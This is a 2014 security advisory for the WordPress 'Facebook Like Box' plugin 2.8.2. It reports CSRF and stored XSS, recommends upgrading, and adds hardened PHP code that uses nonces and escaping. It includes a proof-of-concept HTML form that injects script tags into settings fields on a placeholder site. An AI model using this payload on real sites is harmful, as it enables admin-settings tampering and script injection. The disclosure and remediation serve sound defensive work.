WordPress Facebook Like Box 2.8.2 CSRF / XSS
Posted on 13 December 2014
Title: WordPress 'Facebook Like Box' plugin - CSRF/XSS
Version: 2.8.2
Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/cardoza-facebook-like-box/
Notified WordPress: 2014/11/27

----------------------------------------------------------------
## Description:
----------------------------------------------------------------
Facebook Like Box is a social plugin that enables Facebook Page owners to attract and gain Likes from their own website.

## CSRF:
----------------------------------------------------------------
It is possible to change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page.

## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and echoed on the plugin's admin page. This allows an attacker to perform XSS through these fields.

PoC: Log in to a vulnerable site and press submit on this form:

```html
<form method="POST" action="http://vuln.site/wp-admin/admin.php?page=slug_for_fb_like_box">
<input type="text" name="frm_title" value=""/><script>alert(1);</script>"><br />
<input type="text" name="frm_url" value=""/><script>alert(2);</script>"><br />
<input type="text" name="frm_border_color" value=""/><script>alert(3);</script>"><br />
<input type="text" name="frm_width" value=""/><script>alert(4);</script>"><br />
<input type="text" name="frm_height" value=""/><script>alert(5);</script>"><br />
<input type="text" name="frm_color_scheme" value="light"><br />
<input type="text" name="frm_show_faces" value="true"><br />
<input type="text" name="frm_stream" value="true"><br />
<input type="text" name="frm_header" value="true"><br />
<input type="text" name="frm_submit" value="Save"><br />
<input type="submit">
</form>
```

## Solution
----------------------------------------------------------------
You should upgrade to version 2.8.3.
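As an added illustration (not the plugin's own code), a hardened settings handler for a WordPress admin page showing the two fixes the advisory implies: nonce verification against the CSRF, and sanitizing on save plus escaping on output against the stored XSS. The option name, hook names and function names are assumptions; the field names follow the PoC form above.

```php
<?php
// Added example, not the plugin's code. Hardened save/render pair for a plugin
// settings page. Field names follow the advisory's PoC form; the option name
// 'example_fb_like_box' and all function/hook names are assumptions.

add_action( 'admin_post_example_fb_like_box_save', 'example_fb_like_box_save' );

function example_fb_like_box_save() {
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF fix: the POST must carry a valid nonce bound to this action.
    //    A form served from another origin cannot know it, so it is rejected.
    check_admin_referer( 'example_fb_like_box_save', '_example_nonce' );

    // 3. Stored XSS fix (input side): coerce each field to the type it should hold.
    $color  = (string) ( $_POST['frm_border_color'] ?? '' );
    $scheme = (string) ( $_POST['frm_color_scheme'] ?? '' );
    $settings = array(
        'frm_title'        => sanitize_text_field( wp_unslash( $_POST['frm_title'] ?? '' ) ),
        'frm_url'          => esc_url_raw( wp_unslash( $_POST['frm_url'] ?? '' ) ),
        'frm_border_color' => preg_match( '/^#[0-9a-fA-F]{6}$/', $color ) ? $color : '#000000',
        'frm_width'        => absint( $_POST['frm_width'] ?? 0 ),   // integers only
        'frm_height'       => absint( $_POST['frm_height'] ?? 0 ),
        'frm_color_scheme' => in_array( $scheme, array( 'light', 'dark' ), true ) ? $scheme : 'light',
        'frm_show_faces'   => ! empty( $_POST['frm_show_faces'] ), // booleans, not free text
        'frm_stream'       => ! empty( $_POST['frm_stream'] ),
        'frm_header'       => ! empty( $_POST['frm_header'] ),
    );
    update_option( 'example_fb_like_box', $settings );
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=example_fb_like_box' ) ) );
    exit;
}

function example_fb_like_box_render_form() {
    $s = get_option( 'example_fb_like_box', array() );
    // 4. Stored XSS fix (output side): escape every stored value where it is echoed.
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_fb_like_box_save">
        <?php wp_nonce_field( 'example_fb_like_box_save', '_example_nonce' ); ?>
        <input type="text" name="frm_title" value="<?php echo esc_attr( $s['frm_title'] ?? '' ); ?>">
        <input type="text" name="frm_url" value="<?php echo esc_attr( $s['frm_url'] ?? '' ); ?>">
        <input type="text" name="frm_border_color" value="<?php echo esc_attr( $s['frm_border_color'] ?? '' ); ?>">
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

With this pattern the PoC form above fails at `check_admin_referer` before any option is written, and even a value that did reach storage is rendered inert by `esc_attr` at output.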
